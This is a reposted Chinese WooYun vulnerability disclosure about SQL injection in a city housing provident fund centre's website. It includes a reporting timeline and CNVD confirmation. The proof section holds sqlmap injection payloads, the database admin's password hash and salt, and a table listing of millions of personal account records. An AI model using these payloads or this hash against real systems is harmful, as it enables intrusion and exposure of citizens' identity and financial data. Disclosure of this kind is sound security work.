某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

admin
admin
admin
139701
文章
114
评论
2017年4月14日20:02:57评论360 views字数 273阅读0分54秒阅读模式
摘要

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2016-191218

漏洞标题: 某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

相关厂商: 某市住房公积金管理中心

漏洞作者: 路人甲

提交时间: 2016-04-01 00:00

公开时间: 2016-05-20 18:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 10

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

2人收藏

漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开

简要描述:

如题、、、

详细说明:

某市住房公积金管理中心注入漏洞(SA),泄露700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)。。。

注入点:http://**.**.**.**/List/DownLoadCenterDetails?id=5EBC88CC-A248-41FD-9703-7FD6CC454628 用神器SQLMAP 跑了一下发现SA权限、、、直接可以跑出大量敏感的信息,包括公积金金额、居民身份证、名字、所在单位公司名字等等信息。。。

+-----------------------------------------+---------+

| Table | Entries |

+-----------------------------------------+---------+

| dbo.Fq_PersonAccountDetails | 7130445 |

| dbo.Fq_LoanDetails | 889789 |

| dbo.Fq_FundAccountsInfo | 580320 |

| dbo.Im_PFAccountContrast | 575657 |

code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: GET
 Parameter: id
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' AND 9621=9621 AND 'EhJf'='
 EhJf
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries
     Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525'; WAITFOR DELAY '0:0:5'--
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind
     Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' WAITFOR DELAY '0:0:5'--
 ---
 [07:57:29] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2008
 web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
 back-end DBMS: Microsoft SQL Server 2005
 available databases [7]:
 [*] AdventureWorks
 [*] AdventureWorksDW
 [*] GIOT_QZgjj
 [*] master
 [*] model
 [*] msdb
 [*] tempdb
 
 
 current database:    'GIOT_QZgjj'
 
 current user:    'sa'
 
 database management system users password hashes:
 [*] sa [1]:
     password hash: 0x01004086ceb659f0af51ae621f0e86391ef163ba496c273d29ec
         header: 0x0100
         salt: 4086ceb6
         mixedcase: 59f0af51ae621f0e86391ef163ba496c273d29ec
 
 [09:10:38] [INFO] testing if current user is DBA
 database management system users privileges:
 [*] sa (administrator)
 
 
 Database: GIOT_QZgjj
 [88 tables]
 +-------------------------------------+
 | Bi_Company                          |
 | Bi_CompanySort                      |
 | Bi_Department                       |
 | Bi_DicType                          |
 | Bi_DicValue                         |
 | Bi_EmployeeInfo                     |
 | Bi_NotWorkDay                       |
 | Bi_Position                         |
 | Cp_OverviewManagement               |
 | Cp_ProvidentFundCard                |
 | Cs_LendingRates                     |
 | Cs_LendingYearRates                 |
 | Fq_AccountsSMS                      |
 | Fq_CompanyAccountsInfo              |
 | Fq_CompanyAcountsInfoPro            |
 | Fq_FundAccountsInfo                 |
 | Fq_FundAccountsInfoPro              |
 | Fq_LoanAccount                      |
 | Fq_LoanAccountContrast_V            |
 | Fq_LoanAccountPro                   |
 | Fq_LoanAccountProNew_V              |
 | Fq_LoanAccountProNo_V               |
 | Fq_LoanBank                         |
 | Fq_LoanDetailSMS                    |
 | Fq_LoanDetails                      |
 | Fq_LoanDetailsPro                   |
 | Fq_LoanHandleProgress               |
 | Fq_LoanHandleProgressPro            |
 | Fq_ManagementDept                   |
 | Fq_PFPersonAccountProNo_V           |
 | Fq_PersonAccountDetails             |
 | Fq_PersonAccountDetailsPro          |
 | Fq_PersonAccountNew_V               |
 | Fq_WhichLinks                       |
 | Ic_ComplaintsRights                 |
 | Ic_ConsultingInteractive            |
 | Ic_ReplyQuestion                    |
 | Im_AnnouncementPublicity            |
 | Im_CanGoodsProperty                 |
 | Im_CategoryManagement               |
 | Im_CustomerInfo                     |
 | Im_DownloadCenter                   |
 | Im_Floatage                         |
 | Im_FundCreditBlacklist              |
 | Im_GovernmentInformationDisclosure  |
 | Im_LawGuide                         |
 | Im_Links                            |
 | Im_PFAccountContrast                |
 | Im_PaymentHandlingProgressPublicity |
 | Im_PoliciesRegulations              |
 | Im_RotationDiagram                  |
 | Im_SearchKeywords                   |
 | Im_SpecialTopic                     |
 | Im_VerificationManage               |
 | Im_WorkDynamics                     |
 | Pf_AccountContrast_V                |
 | Rs_HomeServiceReservationManage     |
 | Rs_ReservationManage                |
 | Rs_ReservationManageDepartment      |
 | Rs_ReservationNumberLimit           |
 | Rs_SMSTemplates                     |
 | Sa_ControlInfo                      |
 | Sa_LoginControl                     |
 | Sa_ParameterConfiguration           |
 | Sa_Privilege_Company_Handle         |
 | Sa_UpdateLog                        |
 | Sa_UserInfo                         |
 | Sh_ComCustomerInfo                  |
 | Sh_Persom                           |
 | Sh_PersonChangePayListDetail        |
 | Sh_PersonFundChangeDetail           |
 | Sh_Settings                         |
 | bo.Sh_PersonFundChange              |
 | sa_LogError                         |
 | sa_LogHandle                        |
 | sa_LogHandle_Report                 |
 | sa_LogLoa                           |
 | sa_LogLogin_Report                  |
 | sa_Menu_Handle_Tree_View            |
 | sa_OnLiner                          |
 | sa_Role_User                        |
 | sa_Role_User_v                      |
 | sa_handle_Guid                      |
 | sa_menu_Guid                        |
 | sa_privilege_Handle                 |
 | sa_privilege_Handle_v               |
 | sa_role                             |
 | sa_user_menu                        |
 +-------------------------------------+

某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

漏洞证明:

具体的跑出的数据如下:

code 区域 
Database: GIOT_QZgjj
 +-----------------------------------------+---------+
 | Table                                   | Entries |
 +-----------------------------------------+---------+
 | dbo.Fq_PersonAccountDetails             | 7130445 |
 | dbo.Fq_LoanDetails                      | 889789  |
 | dbo.Fq_FundAccountsInfo                 | 580320  |
 | dbo.Im_PFAccountContrast                | 575657  |
 | dbo.Im_VerificationManage               | 273258  |
 | dbo.Fq_AccountsSMS                      | 209707  |
 | dbo.Pf_AccountContrast_V                | 120413  |
 | dbo.Fq_LoanHandleProgress               | 97543   |
 | dbo.Im_CustomerInfo                     | 63783   |
 | dbo.Fq_LoanAccount                      | 60268   |
 | dbo.Fq_LoanDetailSMS                    | 55956   |
 | dbo.Fq_LoanAccountContrast_V            | 22150   |
 | dbo.Fq_LoanDetailsPro                   | 4200    |
 | dbo.Ic_ConsultingInteractive            | 1714    |
 | dbo.Sa_LoginControl                     | 1160    |
 | dbo.sa_OnLiner                          | 475     |
 | dbo.sa_privilege_Handle                 | 438     |
 | dbo.sa_privilege_Handle_v               | 438     |
 | dbo.Ic_ReplyQuestion                    | 330     |
 | dbo.Im_SpecialTopic                     | 321     |
 | dbo.sa_Menu_Handle_Tree_View            | 287     |
 | dbo.Im_WorkDynamics                     | 285     |
 | dbo.sa_LogError                         | 252     |
 | dbo.sa_handle_Guid                      | 202     |
 | dbo.sa_LogHandle                        | 116     |
 | dbo.Im_AnnouncementPublicity            | 114     |
 | dbo.Im_CanGoodsProperty                 | 105     |
 | dbo.sa_menu_Guid                        | 85      |
 | dbo.Ic_ComplaintsRights                 | 84      |
 | dbo.Im_PoliciesRegulations              | 74      |
 | dbo.Im_CategoryManagement               | 65      |
 | dbo.Sh_Settings                         | 52      |
 | dbo.Rs_ReservationManage                | 50      |
 | dbo.Im_LawGuide                         | 45      |
 | dbo.Fq_LoanBank                         | 34      |
 | dbo.Im_DownloadCenter                   | 25      |
 | dbo.Im_GovernmentInformationDisclosure  | 19      |
 | dbo.Cp_ProvidentFundCard                | 14      |
 | dbo.Fq_ManagementDept                   | 13      |
 | dbo.Im_PaymentHandlingProgressPublicity | 13      |
 | dbo.sa_LogLogin_Report                  | 12      |
 | dbo.Sa_UserInfo                         | 12      |
 | dbo.Rs_HomeServiceReservationManage     | 11      |
 | dbo.Rs_ReservationManageDepartment      | 11      |
 | dbo.Bi_EmployeeInfo                     | 10      |
 | dbo.Im_RotationDiagram                  | 10      |
 | dbo.Rs_ReservationNumberLimit           | 10      |
 | dbo.sa_Role_User                        | 10      |
 | dbo.sa_Role_User_v                      | 10      |
 | dbo.Im_Links                            | 9       |
 | dbo.Fq_WhichLinks                       | 8       |
 | dbo.Rs_SMSTemplates                     | 7       |
 | dbo.Sa_ControlInfo                      | 7       |
 | dbo.Sa_Privilege_Company_Handle         | 7       |
 | dbo.Sa_ParameterConfiguration           | 6       |
 | dbo.Im_SearchKeywords                   | 4       |
 | dbo.sa_LogHandle_Report                 | 4       |
 | dbo.Bi_Company                          | 3       |
 | dbo.Bi_Department                       | 3       |
 | dbo.Bi_DicType                          | 3       |
 | dbo.Bi_DicValue                         | 3       |
 | dbo.Cp_OverviewManagement               | 3       |
 | dbo.Bi_CompanySort                      | 2       |
 | dbo.Cs_LendingYearRates                 | 2       |
 | dbo.sa_role                             | 2       |
 | dbo.Sh_ComCustomerInfo                  | 2       |
 | dbo.Sh_PersonChangePayListDetail        | 2       |
 | dbo.Bi_NotWorkDay                       | 1       |
 | dbo.Cs_LendingRates                     | 1       |
 | dbo.Im_Floatage                         | 1       |
 +-----------------------------------------+---------+

某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

修复方案:

过滤吧、、、

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-05 18:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin